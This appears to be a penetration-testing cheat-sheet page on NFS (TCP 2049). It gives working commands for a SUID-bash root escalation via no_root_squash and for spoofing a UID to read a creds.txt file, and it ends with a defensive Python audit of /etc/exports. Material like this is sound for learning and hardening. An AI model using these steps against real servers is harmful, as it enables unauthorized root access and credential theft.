TCP 2049: NFS
Network File System is a distributed file system protocol originally developed by Sun Microsystems in 1984, allowing a user on a client computer to access files over a computer network much like local storage is accessed.
-- Wikipedia
Basics
Show mounts
sudo showmount -e <ip>
Mount
sudo mkdir /mnt/<share>
sudo mount <ip>:/<share> /mnt/<share>
Privilege escalation via root_squash
When root_squash is enabled (the default), root on a connecting client is mapped to "nfsnobody" (least local privileges). However, when it is turned off (no_root_squash), one can upload a SUID binary and execute it.
e.g. using bash
# get a compatible bash binary for the target system
sudo chown root bash
sudo chmod +sx bash
On target
./bash -p
Exploitation
If the owner and group of files on the mount show up as "65534 / nobody" or "4294967294 / UNKNOWN":
-rwx------ 1 nobody 4294967294 48 Oct 28 2019 creds.txt
Try mounting with NFS version 3:
mount -t nfs -o vers=3 <ip>:/<share> <share>
-rwx------ 1 1014 1014 48 Oct 28 2019 creds.txt
Now all that's left is to create a user with that ID to access the file:
groupadd --gid 1014 nfsgroup
useradd --uid 1014 --groups nfsgroup nfsuser
sudo -u nfsuser ls -l
Source: Write-up Vulnix - playing around with NFS - Christophe Tafani-Dereeper
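Server-side check for both issues above, as an added example (not from the original page or the cited write-up): a small audit of /etc/exports that flags no_root_squash entries and entries where AUTH_SYS lets the server trust client-supplied UIDs even with root_squash on. The sample exports content and the finding labels are constructed, and the parser only handles the common host(opts) form.

```python
import re

# Constructed sample /etc/exports content (not from any real host).
SAMPLE_EXPORTS = """\
/srv/build   10.0.0.0/24(rw,sync,no_root_squash)
/srv/home    *(rw,root_squash)   # root_squash is also the default
/srv/public  *(ro,all_squash,anonuid=65534,anongid=65534)
/srv/secure  client.example.internal(rw,sec=krb5p)
"""

CLIENT_RE = re.compile(r"(?P<host>[^\s()]*)(?:\((?P<opts>[^)]*)\))?")


def audit_exports(text):
    """Return (path, client, finding) tuples for risky export entries."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients:
            m = CLIENT_RE.fullmatch(spec)
            if m is None:
                findings.append((path, spec, "unparsed"))
                continue
            host = m.group("host") or "*"     # bare "(opts)" applies to any host
            opts = [o.strip() for o in (m.group("opts") or "").split(",") if o.strip()]
            # Security flavors; with no sec= option the export uses sys (AUTH_SYS).
            flavors = ["sys"]
            for o in opts:
                if o.startswith("sec="):
                    flavors = o[4:].split(":")
            if "no_root_squash" in opts:
                # Client uid 0 stays uid 0, so root-owned SUID files can be written.
                findings.append((path, host, "no_root_squash"))
            if "sys" in flavors and "all_squash" not in opts:
                # Server trusts the numeric UID the client sends (the 1014 case above).
                findings.append((path, host, "auth_sys_uid_trust"))
    return findings


if __name__ == "__main__":
    for path, host, finding in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:12} {host:14} {finding}")
```

Entries that use only Kerberos flavors (sec=krb5, krb5i, krb5p) or all_squash come back clean; everything else relies on the client being honest about its UID.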